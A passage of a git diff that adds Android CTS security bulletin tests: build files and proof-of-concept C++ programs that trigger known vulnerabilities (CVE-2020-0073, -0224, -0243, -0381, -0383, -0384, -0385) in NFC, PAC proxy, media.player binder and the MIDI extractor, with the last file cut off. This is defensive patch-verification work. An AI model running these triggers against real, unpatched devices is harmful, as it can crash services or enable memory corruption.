+ include_dirs: [
+ "system/nfc/src/nfc/include",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/include",
+ "system/nfc/src/gki/ulinux",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/poc.cpp
new file mode 100644
index 0000000..d6ea446
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/poc.cpp
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include "../includes/common.h"
+#include <nfc_api.h>
+#include <rw_int.h>
+
+extern tRW_CB rw_cb;
+void rw_init(void);
+void rw_t2t_handle_rsp(uint8_t* p_data);
+void poc_cback(tRW_EVENT event, tRW_DATA* p_rw_data) {
+ (void)event;
+ (void)p_rw_data;
+}
+
+int main() {
+ tRW_T2T_CB* p_t2t = &rw_cb.tcb.t2t;
+ rw_init();
+ rw_cb.p_cback = &poc_cback;
+ p_t2t->state = RW_T2T_STATE_DETECT_TLV;
+ p_t2t->tlv_detect = TAG_LOCK_CTRL_TLV;
+ p_t2t->substate = RW_T2T_SUBSTATE_WAIT_READ_TLV_VALUE;
+ p_t2t->found_tlv = TAG_LOCK_CTRL_TLV;
+ p_t2t->bytes_count = 1;
+ p_t2t->num_lockbytes = RW_T2T_MAX_LOCK_BYTES;
+ uint8_t data[T2T_READ_DATA_LEN];
+ rw_t2t_handle_rsp(data);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/Android.bp
new file mode 100644
index 0000000..96dfeb1
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/Android.bp
@@ -0,0 +1,31 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2020-0224",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ shared_libs: [
+ "libpac",
+ ],
+ srcs: [
+ "poc.cpp",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/poc.cpp
new file mode 100644
index 0000000..de62221
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/poc.cpp
@@ -0,0 +1,60 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <codecvt>
+#include <fstream>
+#include "../includes/common.h"
+#include <proxy_resolver_v8_wrapper.h>
+
+using namespace std;
+
+void poc(char* raw) {
+ ProxyResolverV8Handle* handle = ProxyResolverV8Handle_new();
+ string u8Script(raw);
+ u16string u16Script =
+ wstring_convert<codecvt_utf8_utf16<char16_t>, char16_t> { }
+ .from_bytes(u8Script);
+
+ ProxyResolverV8Handle_SetPacScript(handle, u16Script.data());
+ const char16_t* spec = u"", *host = u"";
+ ProxyResolverV8Handle_GetProxyForURL(handle, spec, host);
+ ProxyResolverV8Handle_delete(handle);
+}
+
+int main(int argc, char **argv) {
+ if (argc != 2) {
+ return EXIT_FAILURE;
+ }
+
+ ifstream stream;
+ stream.open(argv[1]);
+ if (stream.rdstate() != ifstream::goodbit) {
+ return EXIT_FAILURE;
+ }
+
+ stream.seekg(0, ios::end);
+ size_t size = stream.tellg();
+ stream.seekg(0);
+ char* raw = (char*) calloc(size + 1, sizeof(char));
+ stream.read(raw, size);
+ time_t currentTime = start_timer();
+ while (timer_active(currentTime)) {
+ poc(raw);
+ }
+
+ free(raw);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/Android.bp
new file mode 100644
index 0000000..6fb13ed
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/Android.bp
@@ -0,0 +1,33 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2020-0243",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ shared_libs: [
+ "libutils",
+ "libbinder",
+ "libutilscallstack",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/poc.cpp
new file mode 100644
index 0000000..5841427
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/poc.cpp
@@ -0,0 +1,97 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <binder/IServiceManager.h>
+#include <binder/Parcel.h>
+
+#include "../includes/common.h"
+
+using namespace android;
+
+typedef struct ThreadParams {
+ sp<IBinder> service;
+} ThreadParams;
+
+static void *thread_getParameter(void *p) {
+ ThreadParams *params = (ThreadParams *)p;
+ int err;
+ time_t currentTime = start_timer();
+ while (timer_active(currentTime)) {
+ Parcel data, reply;
+ data.writeInterfaceToken(params->service->getInterfaceDescriptor());
+ int key = (('m') << 24 | ('t') << 16 | ('r') << 8 | ('X'));
+ data.writeInt32(key);
+ err = params->service->transact(/*GET_PARAMETER_ID*/ 31, data, &reply, 0);
+ if (err == EPIPE) {
+ break;
+ }
+ usleep(5000);
+ }
+ return nullptr;
+}
+
+int main() {
+ status_t err;
+ sp<IServiceManager> sm = defaultServiceManager();
+ String16 name(String16("media.player"));
+ sp<IBinder> service = sm->checkService(name);
+ sp<IBinder> binder = nullptr;
+ if (not service) {
+ return EXIT_FAILURE;
+ }
+
+ String16 interface_name = service->getInterfaceDescriptor();
+ Parcel data, reply;
+ data.writeInterfaceToken(interface_name);
+ data.writeStrongBinder(new BBinder());
+ for (int i = 0; i < 1024; ++i)
+ data.writeInt32(1);
+ if (service) {
+ err = service->transact(/*CREATE_ID*/ 1, data, &reply, 0);
+ binder = reply.readStrongBinder();
+ }
+
+ if (not binder) {
+ return EXIT_FAILURE;
+ }
+
+ pthread_t t1, t2;
+
+ ThreadParams *params = new ThreadParams();
+ params->service = binder;
+ pthread_create(&t1, nullptr, thread_getParameter, params);
+ pthread_create(&t2, nullptr, thread_getParameter, params);
+
+ time_t currentTime = start_timer();
+ while (timer_active(currentTime)) {
+ if (not binder) {
+ break;
+ }
+ Parcel data, reply;
+ data.writeInterfaceToken(binder->getInterfaceDescriptor());
+ data.writeStrongBinder(binder);
+ err = binder->transact(/*SET_DATA_SOURCE_URL_ID*/ 2, data, &reply, 0);
+ if (err == EPIPE) {
+ break;
+ }
+ usleep(500000);
+ }
+
+ pthread_join(t1, nullptr);
+ pthread_join(t2, nullptr);
+ delete params;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/Android.bp
new file mode 100644
index 0000000..8666fda
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/Android.bp
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2020-0381",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ include_dirs: [
+ "frameworks/av/media/libmedia/include/android",
+ "frameworks/av/media/libmedia/include",
+ "frameworks/av/media/libstagefright/foundation/include",
+ "frameworks/av/media/libstagefright/foundation/include/media/stagefright/foundation",
+ "frameworks/av/media/libstagefright/include",
+ "frameworks/av/media/libstagefright/include/media/stagefright",
+ ],
+ shared_libs: [
+ "libutils",
+ "libmediandk",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ]
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/poc.cpp
new file mode 100644
index 0000000..43da25d
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/poc.cpp
@@ -0,0 +1,129 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <IMediaExtractor.h>
+#include <dlfcn.h>
+#include <signal.h>
+#include <stdlib.h>
+#include <fcntl.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+#if _32_BIT
+#define LIBNAME "/system/lib/extractors/libmidiextractor.so"
+#define LIBNAME_APEX \
+ "/apex/com.android.media/lib/extractors/libmidiextractor.so"
+#elif _64_BIT
+#define LIBNAME "/system/lib64/extractors/libmidiextractor.so"
+#define LIBNAME_APEX \
+ "/apex/com.android.media/lib64/extractors/libmidiextractor.so"
+#endif
+
+char enable_selective_overload = ENABLE_NONE;
+
+using namespace android;
+
+class XMFDataSource : public DataSource {
+public:
+ int mFdData;
+ int mFdInfo;
+ XMFDataSource(int fdData, int fdInfo) {
+ mFdData = fdData;
+ mFdInfo = fdInfo;
+ }
+
+ ~XMFDataSource() = default;
+
+ virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data,
+ size_t size) {
+ uint32_t infoOffset, infoSize;
+ read(mFdInfo, &infoSize, sizeof(int32_t));
+ read(mFdInfo, &infoOffset, sizeof(int32_t));
+ lseek(mFdData, infoOffset, SEEK_SET);
+ read(mFdData, data, infoSize);
+ return size;
+ }
+
+ virtual status_t getSize(off64_t *size) {
+ *size = 0x10000;
+ return 0;
+ }
+ virtual status_t initCheck() const { return 0; }
+};
+
+void close_resources(int fdData, int fdInfo, void *libHandle) {
+ if (fdData >= 0) {
+ ::close(fdData);
+ }
+ if (fdInfo >= 0) {
+ ::close(fdInfo);
+ }
+ if (libHandle) {
+ dlclose(libHandle);
+ }
+}
+
+int main(int argc, char **argv) {
+ if (argc < 3) {
+ return EXIT_FAILURE;
+ }
+ enable_selective_overload = ENABLE_ALL;
+ void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ return EXIT_FAILURE;
+ }
+ }
+
+ GetExtractorDef getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF");
+ if (!getDef) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+
+ int fdData = open(argv[1], O_RDONLY);
+ if (fdData < 0) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+ int fdInfo = open(argv[2], O_RDONLY);
+ if (fdInfo < 0) {
+ close_resources(fdData, fdInfo, libHandle);
+ return EXIT_FAILURE;
+ }
+
+ sp<DataSource> dataSource = (sp<DataSource>)new XMFDataSource(fdData, fdInfo);
+ if (!dataSource) {
+ close_resources(fdData, fdInfo, libHandle);
+ return EXIT_FAILURE;
+ }
+
+ void *meta = nullptr;
+ FreeMetaFunc freeMeta = nullptr;
+
+ float confidence = 0.0f;
+ if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) {
+ getDef().u.v2.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+ } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) {
+ getDef().u.v3.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+ }
+
+ close_resources(fdData, fdInfo, libHandle);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/Android.bp
new file mode 100644
index 0000000..69c17b1
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/Android.bp
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2020-0383",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ include_dirs: [
+ "frameworks/av/media/libmedia/include",
+ "frameworks/av/media/libmedia/include/android",
+ "frameworks/av/media/libstagefright/include",
+ "frameworks/av/media/libstagefright/foundation/include",
+ ],
+ shared_libs: [
+ "libutils",
+ "libmediandk",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ]
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/poc.cpp
new file mode 100644
index 0000000..313f21a7
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/poc.cpp
@@ -0,0 +1,129 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <IMediaExtractor.h>
+#include <dlfcn.h>
+#include <signal.h>
+#include <stdlib.h>
+#include <fcntl.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+#if _32_BIT
+#define LIBNAME "/system/lib/extractors/libmidiextractor.so"
+#define LIBNAME_APEX \
+ "/apex/com.android.media/lib/extractors/libmidiextractor.so"
+#elif _64_BIT
+#define LIBNAME "/system/lib64/extractors/libmidiextractor.so"
+#define LIBNAME_APEX \
+ "/apex/com.android.media/lib64/extractors/libmidiextractor.so"
+#endif
+
+char enable_selective_overload = ENABLE_NONE;
+
+using namespace android;
+
+class XMFDataSource : public DataSource {
+public:
+ int mFdData;
+ int mFdInfo;
+ XMFDataSource(int fdData, int fdInfo) {
+ mFdData = fdData;
+ mFdInfo = fdInfo;
+ }
+
+ ~XMFDataSource() = default;
+
+ virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data,
+ size_t size) {
+ uint32_t infoOffset, infoSize;
+ read(mFdInfo, &infoSize, sizeof(int32_t));
+ read(mFdInfo, &infoOffset, sizeof(int32_t));
+ lseek(mFdData, infoOffset, SEEK_SET);
+ read(mFdData, data, infoSize);
+ return size;
+ }
+
+ virtual status_t getSize(off64_t *size) {
+ *size = 0x10000;
+ return 0;
+ }
+ virtual status_t initCheck() const { return 0; }
+};
+
+void close_resources(int fdData, int fdInfo, void *libHandle) {
+ if (fdData >= 0) {
+ ::close(fdData);
+ }
+ if (fdInfo >= 0) {
+ ::close(fdInfo);
+ }
+ if (libHandle) {
+ dlclose(libHandle);
+ }
+}
+
+int main(int argc, char **argv) {
+ if (argc < 3) {
+ return EXIT_FAILURE;
+ }
+ enable_selective_overload = ENABLE_ALL;
+ void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ return EXIT_FAILURE;
+ }
+ }
+
+ GetExtractorDef getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF");
+ if (!getDef) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+
+ int fdData = open(argv[1], O_RDONLY);
+ if (fdData < 0) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+ int fdInfo = open(argv[2], O_RDONLY);
+ if (fdInfo < 0) {
+ close_resources(fdData, fdInfo, libHandle);
+ return EXIT_FAILURE;
+ }
+
+ sp<DataSource> dataSource = (sp<DataSource>)new XMFDataSource(fdData, fdInfo);
+ if (!dataSource) {
+ close_resources(fdData, fdInfo, libHandle);
+ return EXIT_FAILURE;
+ }
+
+ void *meta = nullptr;
+ FreeMetaFunc freeMeta = nullptr;
+
+ float confidence = 0.0f;
+ if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) {
+ getDef().u.v2.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+ } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) {
+ getDef().u.v3.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+ }
+
+ close_resources(fdData, fdInfo, libHandle);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/Android.bp
new file mode 100644
index 0000000..7f8078c
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/Android.bp
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2020-0384",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ include_dirs: [
+ "frameworks/av/media/libmedia/include/android",
+ "frameworks/av/media/libmedia/include",
+ "frameworks/av/media/libstagefright/foundation/include",
+ "frameworks/av/media/libstagefright/foundation/include/media/stagefright/foundation",
+ "frameworks/av/media/libstagefright/include",
+ "frameworks/av/media/libstagefright/include/media/stagefright",
+ ],
+ shared_libs: [
+ "libutils",
+ "libmediandk",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ]
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp
new file mode 100644
index 0000000..43da25d
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp
@@ -0,0 +1,129 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <IMediaExtractor.h>
+#include <dlfcn.h>
+#include <signal.h>
+#include <stdlib.h>
+#include <fcntl.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+#if _32_BIT
+#define LIBNAME "/system/lib/extractors/libmidiextractor.so"
+#define LIBNAME_APEX \
+ "/apex/com.android.media/lib/extractors/libmidiextractor.so"
+#elif _64_BIT
+#define LIBNAME "/system/lib64/extractors/libmidiextractor.so"
+#define LIBNAME_APEX \
+ "/apex/com.android.media/lib64/extractors/libmidiextractor.so"
+#endif
+
+char enable_selective_overload = ENABLE_NONE;
+
+using namespace android;
+
+class XMFDataSource : public DataSource {
+public:
+ int mFdData;
+ int mFdInfo;
+ XMFDataSource(int fdData, int fdInfo) {
+ mFdData = fdData;
+ mFdInfo = fdInfo;
+ }
+
+ ~XMFDataSource() = default;
+
+ virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data,
+ size_t size) {
+ uint32_t infoOffset, infoSize;
+ read(mFdInfo, &infoSize, sizeof(int32_t));
+ read(mFdInfo, &infoOffset, sizeof(int32_t));
+ lseek(mFdData, infoOffset, SEEK_SET);
+ read(mFdData, data, infoSize);
+ return size;
+ }
+
+ virtual status_t getSize(off64_t *size) {
+ *size = 0x10000;
+ return 0;
+ }
+ virtual status_t initCheck() const { return 0; }
+};
+
+void close_resources(int fdData, int fdInfo, void *libHandle) {
+ if (fdData >= 0) {
+ ::close(fdData);
+ }
+ if (fdInfo >= 0) {
+ ::close(fdInfo);
+ }
+ if (libHandle) {
+ dlclose(libHandle);
+ }
+}
+
+int main(int argc, char **argv) {
+ if (argc < 3) {
+ return EXIT_FAILURE;
+ }
+ enable_selective_overload = ENABLE_ALL;
+ void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ return EXIT_FAILURE;
+ }
+ }
+
+ GetExtractorDef getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF");
+ if (!getDef) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+
+ int fdData = open(argv[1], O_RDONLY);
+ if (fdData < 0) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+ int fdInfo = open(argv[2], O_RDONLY);
+ if (fdInfo < 0) {
+ close_resources(fdData, fdInfo, libHandle);
+ return EXIT_FAILURE;
+ }
+
+ sp<DataSource> dataSource = (sp<DataSource>)new XMFDataSource(fdData, fdInfo);
+ if (!dataSource) {
+ close_resources(fdData, fdInfo, libHandle);
+ return EXIT_FAILURE;
+ }
+
+ void *meta = nullptr;
+ FreeMetaFunc freeMeta = nullptr;
+
+ float confidence = 0.0f;
+ if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) {
+ getDef().u.v2.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+ } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) {
+ getDef().u.v3.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+ }
+
+ close_resources(fdData, fdInfo, libHandle);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/Android.bp
new file mode 100644
index 0000000..0da104a
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/Android.bp
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2020-0385",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ include_dirs: [
+ "frameworks/av/media/libmedia/include/android",
+ "frameworks/av/media/libmedia/include",
+ "frameworks/av/media/libstagefright/foundation/include",
+ "frameworks/av/media/libstagefright/foundation/include/media/stagefright/foundation",
+ "frameworks/av/media/libstagefright/include",
+ "frameworks/av/media/libstagefright/include/media/stagefright",
+ ],
+ shared_libs: [
+ "libutils",
+ "libmediandk",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ]
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/poc.cpp
new file mode 100644
index 0000000..43da25d
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/poc.cpp
@@ -0,0 +1,129 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <IMediaExtractor.h>
+#include <dlfcn.h>
+#include <signal.h>
+#include <stdlib.h>
+#include <fcntl.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+#if _32_BIT
+#define LIBNAME "/system/lib/extractors/libmidiextractor.so"
+#define LIBNAME_APEX \
+ "/apex/com.android.media/lib/extractors/libmidiextractor.so"
+#elif _64_BIT
+#define LIBNAME "/system/lib64/extractors/libmidiextractor.so"
+#define LIBNAME_APEX \
+ "/apex/com.android.media/lib64/extractors/libmidiextractor.so"
+#endif
+
+char enable_selective_overload = ENABLE_NONE;
+
+using namespace android;
+
+class XMFDataSource : public DataSource {
+public:
+ int mFdData;
+ int mFdInfo;
+ XMFDataSource(int fdData, int fdInfo) {
+ mFdData = fdData;
+ mFdInfo = fdInfo;
+ }
+
+ ~XMFDataSource() = default;
+
+ virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data,
+ size_t size) {
+ uint32_t infoOffset, infoSize;
+ read(mFdInfo, &infoSize, sizeof(int32_t));
